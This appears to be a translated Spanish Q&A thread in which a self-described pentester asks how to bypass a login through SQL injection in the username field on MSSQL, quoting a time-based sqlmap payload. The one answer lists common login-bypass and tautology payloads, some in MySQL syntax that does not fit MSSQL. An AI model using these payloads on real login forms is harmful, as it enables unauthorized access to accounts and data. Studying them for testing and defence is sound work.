¿ES POSIBLE Omitir un Inicio de Sesión con Inyección de SQL Ciego SOLAMENTE al campo de Nombre de Usuario?

0

Es bueno tenerte leyendo esto, mis preguntas son:

  1. (El título)

  2. Si es posible, ¿podría darme una idea de cómo haría esto para MSSQL porque no soy bueno en eso? Estoy tratando de demostrar el daño que esto podría hacer a un cliente. Se basa en el tiempo como:

NAME=pentest';WAITFOR DELAY '0:0:5'--&PASS=mypass

^ Carga útil como se indica en sqlmap

Gracias !!!

    
pregunta specop aio 24.12.2018 - 04:53
fuente

1 respuesta

0

SÍ, según la carga útil proporcionada por el mapa sql.

Se puede utilizar la siguiente carga útil: -

' or 1=1; -- 
' or 1; #

donde '#' y '-' tienen el mismo propósito de comentar el lado derecho (RHS) de la consulta.

' or 1 limit 1; #
' or 1 limit 1; --

el límite 1 garantizará que solo se recupere un registro en el conjunto de datos, por lo que se proporciona un crédito válido para el mecanismo de inicio de sesión.

Algunas cargas útiles más son: -

OR 'SQLi' = 'SQL'+'i'
OR 'SQLi' > 'S'
or 20 > 1
OR 2 between 3 and 1
OR 'SQLi' = N'SQLi'
1 and 1 = 1
1 || 1 = 1
1 && 1 = 1

que se puede utilizar junto con los ejemplos anteriores.

cita: enlace

    
respondido por el Aayush 24.12.2018 - 12:55
fuente

Lea otras preguntas en las etiquetas